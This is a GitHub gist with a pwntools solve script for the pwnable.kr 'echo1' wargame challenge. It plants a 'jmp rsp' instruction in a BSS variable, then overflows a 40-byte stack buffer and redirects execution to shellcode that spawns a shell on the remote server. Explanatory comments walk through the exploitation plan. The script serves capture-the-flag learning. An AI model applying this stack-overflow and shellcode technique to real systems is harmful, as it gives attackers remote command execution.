Skip to content

Instantly share code, notes, and snippets.

@Pascal-0x90
Created March 9, 2021 23:56
Show Gist options
  • Save Pascal-0x90/1724c77a7598a93a848b12f59bfbc393 to your computer and use it in GitHub Desktop.
Save Pascal-0x90/1724c77a7598a93a848b12f59bfbc393 to your computer and use it in GitHub Desktop.
Pwnable.kr Solves: echo1
#!/usr/bin/python
###################################
# Std imports
import sys
# Third party Imports
from pwn import *
# Binary
BINARY = sys.argv[1]
# Pwntools Binary info
context(os='linux', arch='amd64')
r = ROP(BINARY)
e = ELF(BINARY)
l = e.libc
# Connections and interactions
#p = process(BINARY)
p = remote("pwnable.kr", 9010)
# GDB anyone?
#gdb.attach(p)
#input("Ready to roll?")
###################################
# Junk to fill up buffer
JUNK = b"i"*40
'''
Main idea:
- Since NX is off, we want to try to execute shellcode
- Literally no jmp exists
- Furthermore, I dont want to do complex ropping
- We can write to:
- id (in bss)
- s (on stack)
- o (maybe?? it in heap though)
- We may be able to overwrite some location we know with:
- Address
- Assembly
- Problem is if it is executable or not.
'''
# Address of id. Is in BSS
ID = 0x6020A0
# What do we want to put there? #OverwriteTheBSS
jrsp = "jmp rsp"
jmp_rsp = asm(jrsp)
# What shellcode do we want to execute
sc = shellcraft.sh() # Yeah we are kinda basic here
'''
Flow:
1. Overwrite ret with address of jmp instruction
2. jump to shellcode
3. interact with new bash shell!
buffer + addy + shellcode
'''
# Create our payload
pay = JUNK
pay += p64(ID) # p64 since this is a 64 bit binary
pay += asm(sc) # Our shellcode to execute once jumping back to stack
# Check our length of payload
log.info(f"Payload Length: {len(pay)}")
'''
In order to set the id as contents of assembly,
we will send it in as the first thing asked for
in the program's execution.
'''
# Recv till ready to read
p.clean()
'''
Important thing to remember here, sometimes what func
we use to send intput (ie, sendline vs send) may matter
since that extra space or newline does account for our
input. Since this case we are telling the program to jump
to this location, even if there is some arbitrary value
after the assembly, the jump gets taken first so it's
negligible in this instance.
'''
# Send in our asm
p.writeline(jmp_rsp.ljust(6,b"\0"))
# Now send our option of "echo" type
p.sendline("1")
# Send in our actual payload
p.sendline(pay)
# Should have a shell now, do interactive to check
p.interactive()
p.clean()
'''
p.sendline("cat echo1")
data = p.recvall(timeout=2)
print(data)
'''
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment